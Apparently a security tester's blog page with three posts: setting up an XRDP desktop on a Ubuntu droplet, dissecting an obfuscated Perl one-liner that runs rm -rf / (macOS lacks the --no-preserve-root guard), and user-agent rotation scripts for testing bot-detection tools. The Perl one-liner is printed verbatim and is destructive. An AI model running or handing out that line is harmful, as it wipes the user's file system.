I use DigitalOcean for a majority of my testing and from time to time I need a desktop environment to run some of my tools (like burp). After spending much more time than I want to admit I have it down to these 10 commands to bring a Ubuntu + Mate + XRDP desktop to a Ubuntu Droplet :
sudo apt-get update && sudo apt-get dist-upgrade -y
sudo apt-get install --no-install-recommends ubuntu-mate-core ubuntu-mate-desktop -y
sudo apt-get install mate-core mate-desktop-environment mate-notification-daemon xrdp -y
adduser burp
usermod -aG admin burp
usermod -aG sudo burp
su - burp
echo mate-session> ~/.xsession
sudo cp /home/burp/.xsession /etc/skel
sudo service xrdp restart
From there you can use any RDP viewer to connect to your droplet: 
Month: October 2016
Earlier this week someone sent me this one line perl script (that you shouldn’t run):
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Due to some really clever code obfuscation it runs rm -rf /.
You can deobfuscate (is that word?) with this:
perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;print "$_\n"'
While trying to figure out how this code code I stumbled upon the fact that OSX does not require --no-preserve-root which has been required since version 6.4 of GNU Core Utilities which was released in 2006.
Here is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see' on Ubuntu 16:10:
Here is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see' on MacOS 10.12:
This seems like a pretty big oversight by the Apple Team and I have filled a bug report but haven’t heard anything yet.
Recently I have been working with some NGFW tools to automatically detect and block when someone is scraping, brute forcing or “load testing” your website. I quickly ran into a problem where none of the tools I use would allow me to quickly change user agents so I put together a couple of quick scripts that call one of 7500 valid user agents from this file.
First I went with the old standby of CURL which does the job but I was only able to do 10 requests in 4 seconds.
Here is what the output of curl.sh looks like:
That was not going to be fast enough for my testing needs so I switch to Apache Bench and am able to do 1,000 requests in 2 seconds. Which was what I need to do proper testing.
Here is what the output of ab.sh looks like:
All the scripts are in this GitHub Repo.
As always: Use these for good, not bad.